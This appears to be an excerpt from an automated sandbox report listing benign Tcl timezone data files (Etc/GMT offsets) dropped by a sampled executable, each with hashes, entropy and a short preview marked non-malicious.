                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):118
                                                                                                                                                                                                                              Entropy (8bit):4.965033464829338
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDOPFNMXGm2OH1VYU7vV:SlSWB9eg/yRSPXDm2OH1VYW9
                                                                                                                                                                                                                              MD5:FF71149E56D4CB553D0ED949B5F4C122
                                                                                                                                                                                                                              SHA1:3459B47E0EEC80D7A29512CA4F3F236C89E86573
                                                                                                                                                                                                                              SHA-256:E61E826E6FBC2396EF152640698098F4477D4FFDFE5F791F62250C3EC5865304
                                                                                                                                                                                                                              SHA-512:43B0CC8BD7F1EFC80C3F14F115D651EADD5743B17B854C2FB7AC25995138D3DF8792915C2952B80F35784A7115F8FB335ACE171479B24C668190AC175523DB21
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+10) {.. {-9223372036854775808 -36000 0 -10}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):118
                                                                                                                                                                                                                              Entropy (8bit):5.002239901486653
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDOeJMXGm2OHaBByVn:SlSWB9eg/yRSsDm2OHa7yV
                                                                                                                                                                                                                              MD5:08AABA917A8D6B3BB3D0DD1637F5ABFC
                                                                                                                                                                                                                              SHA1:D1D704F0250D4CBD450922A02D021E0000FBF5CF
                                                                                                                                                                                                                              SHA-256:143528946275DDC8B894218D3F1BE56C950F740828CEC13166C3D7E8E1B6BB7E
                                                                                                                                                                                                                              SHA-512:F37AE54864A613C830308CB94AB7CEA9534A86A53B52B4A2C28CEEFE6F5BC0518143AAFD77A6DA5EC55D392F5BD34FCD4B5BE51794B1A386ED783B9BA89C10C3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+11) {.. {-9223372036854775808 -39600 0 -11}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):118
                                                                                                                                                                                                                              Entropy (8bit):4.97889339723103
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDONdNMXGm2OH3FNyUFFv:SlSWB9eg/yRSNDm2OH3XyMv
                                                                                                                                                                                                                              MD5:7374B66D6E883D7581E9561C3815EB92
                                                                                                                                                                                                                              SHA1:235E96A7420DF6733F3CA368D4A2D57766656043
                                                                                                                                                                                                                              SHA-256:A93EAFAC2C1089C608C8536127D0E8B53D8C7CFD13AE7DD69339E12A89F803C6
                                                                                                                                                                                                                              SHA-512:9BA59B17F20D65DFF1A5A2D557B535F69B04C172AECB15F88CA3484D74CC7D53894985C08653CF13D868BCBD5E7E5041E0CB2F457B5B603F3851198E552E33A7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+12) {.. {-9223372036854775808 -43200 0 -12}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):116
                                                                                                                                                                                                                              Entropy (8bit):4.922268982357521
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDOcF3vFNMXGm2OHnFQVIyV:SlSWB9eg/yRS0fXDm2OHnFQVb
                                                                                                                                                                                                                              MD5:FDDC663E40F8FFFE27959E94625725DF
                                                                                                                                                                                                                              SHA1:EE3FBC1F6C8BBCF1BDC9E5DB4D2EA1A57E2E9BB3
                                                                                                                                                                                                                              SHA-256:AD5833153446960BDE0653A22AE2111BF80CFD61C3010993CE87B81D40C75C72
                                                                                                                                                                                                                              SHA-512:A1B2A153834FEAD7DC27C0918E1B1CB905671F82850C1CAAEBD89F5535703FB259F02F699EA7F82F3044E37668EE93DFA4D4EB862CD437AFF0DABA84867B1963
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+2) {.. {-9223372036854775808 -7200 0 -02}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):4.949132511023475
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDOFfMXGm2OHBFVGAvFv:SlSWB9eg/yRSlDm2OHBFAKV
                                                                                                                                                                                                                              MD5:5C6F16F2CFD46030688066F9BFBE675D
                                                                                                                                                                                                                              SHA1:1DB5F36584822EB92E75B9AC9F440FD671BD90AE
                                                                                                                                                                                                                              SHA-256:C7BEE4C71905EDDB40BAF42C0CD0DC70BB9F298EAAB8B9367D484B8431DD084A
                                                                                                                                                                                                                              SHA-512:FFB2C4CD8EA7DE165C3D989454898FF2023D1A1E3B2B34EC23B1B71EFA7BF2538488DA0069E59F1152B8933D2263B762D2D7C56ADBED826C33FC0BA6672E34DB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+3) {.. {-9223372036854775808 -10800 0 -03}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):4.971627677226461
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDOqJMXGm2OHBvGQy:SlSWB9eg/yRSQDm2OHBON
                                                                                                                                                                                                                              MD5:E35244C1A6084C7BC1D79E437677C55C
                                                                                                                                                                                                                              SHA1:898619DA4B8B9AC72E69C7BD30DEA2ADEF9440FE
                                                                                                                                                                                                                              SHA-256:26D1EF512CC5797FC63BA2B83C7D6271025F4D4F5C904D9FA8E97F053393D9A7
                                                                                                                                                                                                                              SHA-512:0687758558C4C5FF7802F3A57212694A1515761A8337D4B75FFE81434D2AD8A221B005DEC36BF013F2FC3DE1E46DFBED36352811EB7C5A5AE3A167A2E314F57C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+4) {.. {-9223372036854775808 -14400 0 -04}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):4.956438091983076
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDOJNMXGm2OHLVvyV6Aov:SlSWB9eg/yRSDDm2OHLVKVg
                                                                                                                                                                                                                              MD5:7C560A0F3C42E399AC1247CB6C516DC6
                                                                                                                                                                                                                              SHA1:C314B09D4E369C69C23A8DC1FB066FD0CFDC7211
                                                                                                                                                                                                                              SHA-256:054910BDDFC44D9B806BBD3008C30547FA57ECD3C043418C406A725158144688
                                                                                                                                                                                                                              SHA-512:FCE8431B759BD5359847734FD98D9D91394916235B2AF587FC927D5F3196FB283E241A6A9200EA852F9265ECEF81402FF6ACD0FA3A4AAEF6DF9DB1B056B3A9EF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+5) {.. {-9223372036854775808 -18000 0 -05}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):4.974743300958087
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDOAkSMXGm2OHvTmULyn:SlSWB9eg/yRSbSDm2OHviX
                                                                                                                                                                                                                              MD5:EEB1A3E0FD3339E332587D19C116D4EF
                                                                                                                                                                                                                              SHA1:5DBF046031CD354B1EF88E46D3FED74706D21AC6
                                                                                                                                                                                                                              SHA-256:D53BB247E0E429A6243AB9A9BDCAE1EE1CF5F271D79748A843631906AB63A988
                                                                                                                                                                                                                              SHA-512:07BDF9056DC335C773684E634B1D389FBD139464D4597DE862B7EAC096676A093934682BF911F4E68F299789931218C0E431F0CC6BEBD7275B5FC8015EDD0942
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+6) {.. {-9223372036854775808 -21600 0 -06}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):4.930134062078826
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDONeyFNMXGm2OHrXVYVny:SlSWB9eg/yRSNPDm2OHriVy
                                                                                                                                                                                                                              MD5:F92B31548D6BF8CCFA326C0CA6E205A0
                                                                                                                                                                                                                              SHA1:3FFC6C214EDBCBE9C2509306CE73B429113E1C8A
                                                                                                                                                                                                                              SHA-256:6BA5779E35D581B409F53B14B6E28ECC16F536FFEDD45DDBC8DAE4B8C28F66E7
                                                                                                                                                                                                                              SHA-512:317872E986099D02AF083397AE936854043D54CEBF45A70672F02DDC9E2F3B27BC3FA80902F9675131C51A09BBD3C2BD1CD437330935CEA113C643769E0DF20C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+7) {.. {-9223372036854775808 -25200 0 -07}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):4.915798027862021
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDOOF3vXMXGm2OHmFvGpn:SlSWB9eg/yRSqfXDm2OHaOp
                                                                                                                                                                                                                              MD5:B31B15E6006F8DF0D7627D6C90FF39AF
                                                                                                                                                                                                                              SHA1:7C4137BE11DA84771DF6DC5EBC32D5E5E87E060F
                                                                                                                                                                                                                              SHA-256:CA87559B154B165E83482AEE3D753BA8E38ABCA347A005E8504C566433CF4CB3
                                                                                                                                                                                                                              SHA-512:220F7E7379EABBC8ACD7ADBB7A4AC8E93E4B268F8F1C0965B7E6A09735EE86E293EF1C492990331EEB4176B8301A91EC20579756B962AE45C858A96C09349CCD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+8) {.. {-9223372036854775808 -28800 0 -08}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):4.95764928386407
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDO3fMXGm2OHNms:SlSWB9eg/yRSPDm2OHNms
                                                                                                                                                                                                                              MD5:5B10173EB7119F1219250763504A3526
                                                                                                                                                                                                                              SHA1:A845021437C4638079040EF27AEF163C865FF8F8
                                                                                                                                                                                                                              SHA-256:A0987A1D078B0993FB3B07208E3F4538A2319DCDDDEB2FAEA32FC463DEAFB8DB
                                                                                                                                                                                                                              SHA-512:D213285D0A723B7771263122AFA269C2ABD0325A97D32C3870341255C06597DD6851C22860CFF42BF54E3FF5A36FC88C306F3BF1C69E7BD7FD7F69FE7601ED1A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+9) {.. {-9223372036854775808 -32400 0 -09}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):159
                                                                                                                                                                                                                              Entropy (8bit):4.898210849752128
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/yRDIyHp8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/yRUyJ8RQy
                                                                                                                                                                                                                              MD5:5AFB7F12BA056619252D48904523DFA9
                                                                                                                                                                                                                              SHA1:CD6E6681C8302BF38095975DF556BD14959FDAC8
                                                                                                                                                                                                                              SHA-256:EFF27B3DEE9306641FF344801E06BB33FF768CDCCFE2409FA8AF752FF6D39F66
                                                                                                                                                                                                                              SHA-512:2869BB347F42667A3D174816466B15916FC61FCB5A6A1BE1DD750C5C1751602FEE0FE5A27651B7A19C9F6764872DD0F00D3D5AA16CA1A743DBA09646D25A4EB2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:Etc/GMT-0) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):115
                                                                                                                                                                                                                              Entropy (8bit):4.979902281541545
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDI/fMXGm2OHMKUrn:SlSWB9eg/yRUXDm2OHtUr
                                                                                                                                                                                                                              MD5:4000096844091488200125FC8F50E2F5
                                                                                                                                                                                                                              SHA1:9FFEAE66405CFB254180C7DBE185288791DFEE5F
                                                                                                                                                                                                                              SHA-256:B4BF883FBE9246EF4079179A746B1F9E59F2C77D4F598794B60732D198DC6044
                                                                                                                                                                                                                              SHA-512:25C69E04018C2978A2E5748F0D3C61157453D998C16FA4B3C257A6515B87F5FD2B754893B47604BBC60AB60B60BA162BF2D1463E616E72CB8713C736F1B4D428
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-1) {.. {-9223372036854775808 3600 0 +01}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):4.964101313797091
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDINFeyFNMXGm2OHMUUMy:SlSWB9eg/yRUN5XDm2OHXFy
                                                                                                                                                                                                                              MD5:AE6601FACF6BE1E68083F8D353901181
                                                                                                                                                                                                                              SHA1:8B3BFA307D2A94BADD3A1A5E42545D6F7C620BCE
                                                                                                                                                                                                                              SHA-256:EF3046D7789CAE069B5473D053F3EF0157248F8A359A1282EE02BA613A75FC94
                                                                                                                                                                                                                              SHA-512:1859E6A2CB94EFEE7CD5C17803AA4F2DEEBE4DCF43D3B1EA737DF00BA86ECEC79D296D75E69D5829DECB48380B6B650724104FFA7959FD18FE032DF7D002A88B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-10) {.. {-9223372036854775808 36000 0 +10}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):5.00162575418652
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDIVSMXGm2OHlVVtyn:SlSWB9eg/yRUVSDm2OHlVLy
                                                                                                                                                                                                                              MD5:D864BA451C9E441BF47D233626C57B99
                                                                                                                                                                                                                              SHA1:6C38E6F8BA292575C496124572D187F97C9F8E73
                                                                                                                                                                                                                              SHA-256:CCDEADBD18BE81E59A669A460A14AFCBFF733C3A5D164FC2B6B93DEAF009B78A
                                                                                                                                                                                                                              SHA-512:5C16BD1189F3FE6789CB3630C841FD168EC87D0498EE6FCC4C8D635F8CF4BCAF0558B44F859C37E418F6BC5A7F6693D6EF1DD218A1DB6DA2D54FF55916685119
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-11) {.. {-9223372036854775808 39600 0 +11}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):4.978079707159482
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDIjbNMXGm2OHwvv0UIoAov:SlSWB9eg/yRUjJDm2OHwvv0YAov
                                                                                                                                                                                                                              MD5:C3E7748C7CB9D8A7F7FA5170D5098983
                                                                                                                                                                                                                              SHA1:54F5374A32173BEC6EDA430745DCD18749ABC233
                                                                                                                                                                                                                              SHA-256:23B61B18C653E25F7245B0BB6E04AD347E038585B145962FD1EEACE26F118D54
                                                                                                                                                                                                                              SHA-512:4783A7CD4C94CCC67C1C71F9C5D9CD99A3918EA4792D8CE2443ACE8F034B9023EBC02405B5DEAB919AA35FD1FD29D8980774316AC96D32ECDEBEFA15BBE6878D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-12) {.. {-9223372036854775808 43200 0 +12}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):4.994320173226919
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDIaMXGm2OH1dNv7Dy:SlSWB9eg/yRUaDm2OHty
                                                                                                                                                                                                                              MD5:224AAAA8A31C283F50149A090E3970D5
                                                                                                                                                                                                                              SHA1:E7E4876EC2474FEFD82D4B174CA8E3A3427062F5
                                                                                                                                                                                                                              SHA-256:A9F1AD5A7CB5ED43C5E6E8A7A9B887329890ABB75B9FC9483B8543A367457EBE
                                                                                                                                                                                                                              SHA-512:6EE0C6F519AAB2DAA3F7D802F0F838BA9F6BF1D56530000D3C9EA4FDA81DCB9832A3285E36208F29EEB23C27EC5BFD3438DC272929A7531268B7C0626A65D6A5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-13) {.. {-9223372036854775808 46800 0 +13}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):4.9895752453470585
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDIxhfMXGm2OH0FVtXvFv:SlSWB9eg/yRUxJDm2OH8jNv
                                                                                                                                                                                                                              MD5:8ADF71739DCADE63433B7BF8321EAC77
                                                                                                                                                                                                                              SHA1:AA6BDE83FF0D8BCFDE0426160250F2D17D3AF81D
                                                                                                                                                                                                                              SHA-256:A37A7160027BD38356764C4D1AA5B9B17F8D5DC3CFB81EF2ED399E44C41734CE
                                                                                                                                                                                                                              SHA-512:AEE3929DE269ADB5265A54841F041E41595359C101539F6309A4E737E3F5DF0BC91560781C7118975398C29A084113682C78F66E07E2E4AC5EAC8DFC33C4F0ED
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-14) {.. {-9223372036854775808 50400 0 +14}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):115
                                                                                                                                                                                                                              Entropy (8bit):4.921164129348819
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDInWNMXGm2OH/VXF9:SlSWB9eg/yRUnSDm2OH/Vb
                                                                                                                                                                                                                              MD5:CABB864F4E76B90928F5C54CD9334DEB
                                                                                                                                                                                                                              SHA1:4818D47F83F16B9F7612D1E979B2440C170ECDB9
                                                                                                                                                                                                                              SHA-256:7211BF8329B2388563ED8FA8C5140099A171B8A303A9473E9A6F3AF0C5D239CB
                                                                                                                                                                                                                              SHA-512:1FDCB05D675F1D28CB52B9F5EAC7EC52FDF2CE7E7411740A6F8FB5E9D443ED636CE268E3AF9E08605CC3E13A49B2D86FF4EA6A85F518D5C79E263BA94263361D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-2) {.. {-9223372036854775808 7200 0 +02}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):116
                                                                                                                                                                                                                              Entropy (8bit):4.948161547682094
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDIYyXMXGm2OHkNsWYcv:SlSWB9eg/yRUlDm2OHkKWYe
                                                                                                                                                                                                                              MD5:4AE5F29A13A86E4A7064E9200668E43B
                                                                                                                                                                                                                              SHA1:2460BD1BB0FF3A3C774A5C7CC3DA10235DA06B0D
                                                                                                                                                                                                                              SHA-256:BFC86D65B0B94725DCE4C88EDC4300141ABBCA4B6CDECF037C437DF49F0C1D6A
                                                                                                                                                                                                                              SHA-512:190DC38B4A20F964C967866507086317D85D979DFCFA415D1569C485C6476024922BC6E7103273C41889D9D7B22E97933F286FCF4D341248077C1BA777D0EE3B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-3) {.. {-9223372036854775808 10800 0 +03}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):116
                                                                                                                                                                                                                              Entropy (8bit):4.970850637731657
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDIQXMXGm2OHkVsRYovV:SlSWB9eg/yRUQXDm2OHkSN
                                                                                                                                                                                                                              MD5:BBAF760E27C02D176A675AC3CF2D1E6D
                                                                                                                                                                                                                              SHA1:E524FAA7D424A1C1545D1D8EC00169125A68E8E5
                                                                                                                                                                                                                              SHA-256:02E2EEAF88EE179EF63DD29ACC7384A4B46DE1E3A151C1F3A5DD31BBB5A05AEE
                                                                                                                                                                                                                              SHA-512:6AC7CC0E52E7793C7F2D3DDA9551709DEAE654C1182EAD7108D04F1BAAAB7E1C473B6E8A3A126B0E421D8A246294A03B2EE9E070330924502DF2869CC61C37F7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-4) {.. {-9223372036854775808 14400 0 +04}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):116
                                                                                                                                                                                                                              Entropy (8bit):4.955530107787899
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDI7tNMXGm2OHM0VQVFv:SlSWB9eg/yRU7PDm2OHnVQVV
                                                                                                                                                                                                                              MD5:17F64A5969D3755211E60C0A9F83974F
                                                                                                                                                                                                                              SHA1:FEFA84725EFAE6405F43797296C342B974F2D272
                                                                                                                                                                                                                              SHA-256:3A2C75DCA11D1167126F0D44A8682420FAF75B0B82B3DCFC35A9F028A9A759E8
                                                                                                                                                                                                                              SHA-512:77DBCD8284A470E4869976E2E8A5EDE28104283F120C863785A6B2E64CF87E06243196817C0055A9B32D6FFFE94A25772F67D58BF8E885F7EC06C34FABE38766
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-5) {.. {-9223372036854775808 18000 0 +05}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):116
                                                                                                                                                                                                                              Entropy (8bit):4.973993120288556
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDIg3fMXGm2OHETNSTVVn:SlSWB9eg/yRUgPDm2OHETMX
                                                                                                                                                                                                                              MD5:51CAF7956E133C8A9788AE0B8C6145AB
                                                                                                                                                                                                                              SHA1:47F8B49DF9ED477BD95F908693A483AE4FDE881F
